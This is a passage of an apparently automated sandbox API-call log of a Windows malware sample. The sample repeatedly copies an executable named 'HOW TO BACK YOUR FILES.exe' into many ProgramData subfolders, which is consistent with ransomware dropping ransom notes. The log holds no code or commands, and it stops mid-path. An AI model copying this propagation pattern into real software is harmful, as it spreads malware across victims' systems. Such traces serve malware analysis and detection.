lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft" [0090.534] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft" [0090.534] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.534] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.534] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.534] GetLastError () returned 0x0 [0090.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.534] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.535] CloseHandle (hObject=0x120) returned 1 [0090.535] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.535] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4c315d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c315d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.535] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.535] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.535] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc" [0090.535] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc" [0090.535] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.535] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\wwansvc\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.536] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.536] GetLastError () returned 0x0 [0090.536] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.536] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.536] CloseHandle (hObject=0x120) returned 1 [0090.536] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.536] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.537] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.537] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.537] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc\\Profiles") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc\\Profiles" [0090.537] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc\\Profiles" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc\\Profiles") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc\\Profiles" [0090.537] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.537] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc\\Profiles\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\wwansvc\\profiles\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.538] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.538] GetLastError () returned 0x0 [0090.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.538] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.538] CloseHandle (hObject=0x120) returned 1 [0090.538] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.538] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\WwanSvc\\Profiles\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7fffaad0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7fffaad0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.538] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.538] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.538] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT" [0090.539] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT" [0090.539] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.539] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows nt\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.539] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.539] GetLastError () returned 0x0 [0090.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.539] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.540] CloseHandle (hObject=0x120) returned 1 [0090.540] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.540] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.540] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.540] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.540] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSScan", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSScan") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSScan" [0090.540] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSScan" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSScan") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSScan" [0090.540] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.540] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSScan\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows nt\\msscan\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.541] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.541] GetLastError () returned 0x0 [0090.541] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.541] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.541] CloseHandle (hObject=0x120) returned 1 [0090.541] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.541] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSScan\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x635d4000, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x635d4000, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.541] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.541] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.542] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax" [0090.542] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax" [0090.542] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.542] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows nt\\msfax\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.542] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.543] GetLastError () returned 0x0 [0090.543] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.543] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.543] CloseHandle (hObject=0x120) returned 1 [0090.543] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.543] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c33bee0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c33bee0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.543] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.543] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.543] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0090.543] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox" [0090.543] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.543] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows nt\\msfax\\virtualinbox\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.544] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.544] GetLastError () returned 0x0 [0090.544] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.544] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.544] CloseHandle (hObject=0x120) returned 1 [0090.544] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.544] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c362040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c362040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.545] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.545] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.545] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0090.545] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US" [0090.545] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.545] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.545] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.546] GetLastError () returned 0x0 [0090.546] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.546] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.546] CloseHandle (hObject=0x120) returned 1 [0090.546] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.546] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x6366c580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6366c580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.546] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.546] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.546] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems" [0090.546] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems" [0090.546] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.547] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\microsoft\\windows nt\\msfax\\sentitems\\how to back your files.exe"), bFailIfExists=1) returned 0 [0090.547] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0090.547] GetLastError () returned 0x0 [0090.547] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0090.547] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0090.547] CloseHandle (hObject=0x120) returned 1 [0090.548] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0090.548] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\SentItems\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3881a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3881a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0090.548] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0090.548] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0090.548] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue" [0090.548] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows NT\\MSFax\\Queue" [0090.548] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0090.548] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Microsoft\\Windows 